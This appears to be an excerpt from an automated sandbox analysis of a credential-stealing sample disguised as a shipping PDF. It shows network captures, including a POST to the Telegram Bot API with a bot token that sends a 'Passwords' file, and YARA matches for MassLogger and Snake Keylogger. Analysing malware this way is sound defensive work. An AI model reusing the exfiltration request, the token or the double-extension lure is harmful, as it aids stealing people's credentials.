                                                                                              2025-03-17 10:09:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.2249163149.154.167.2204433720C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-03-17 10:09:46 UTC295OUTPOST /bot7686228576:AAFCRREYytnmTaqdF-c37qTodNKZZxoFsFg/sendDocument?chat_id=7632407857&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary================8dd651a7455f1ea
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 1089
                                                                                              Connection: Keep-Alive
                                                                                              2025-03-17 10:09:46 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 36 35 31 61 37 34 35 35 66 31 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: --===============8dd651a7455f1eaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                              2025-03-17 10:09:46 UTC388INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Mon, 17 Mar 2025 10:09:46 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 557
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2025-03-17 10:09:46 UTC557INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 38 36 32 32 38 35 37 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 62 6f 64 73 62 6f 64 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 6f 64 73 62 6f 64 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 36 33 32 34 30 37 38 35 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 64 73 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 64 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 6f 64 73 62 6f 64 73 35 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 32 32 30 36 31 38 36 2c 22 64 6f 63
                                                                                              Data Ascii: {"ok":true,"result":{"message_id":2634,"from":{"id":7686228576,"is_bot":true,"first_name":"bodsbods","username":"bodsbods_bot"},"chat":{"id":7632407857,"first_name":"Bods","last_name":"Bods","username":"bodsbods51","type":"private"},"date":1742206186,"doc


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              • File
                                                                                              • Registry
                                                                                              • Network

                                                                                              Click to dive into process behavior distribution

                                                                                              Target ID:0
                                                                                              Start time:06:09:34
                                                                                              Start date:17/03/2025
                                                                                              Path:C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
                                                                                              Imagebase:0x10f0000
                                                                                              File size:971'776 bytes
                                                                                              MD5 hash:5FD799C047C81A8EFB15D9A32F1D8E39
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:06:09:35
                                                                                              Start date:17/03/2025
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
                                                                                              Imagebase:0x250000
                                                                                              File size:45'248 bytes
                                                                                              MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:moderate
                                                                                              Has exited:false
                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                              No disassembly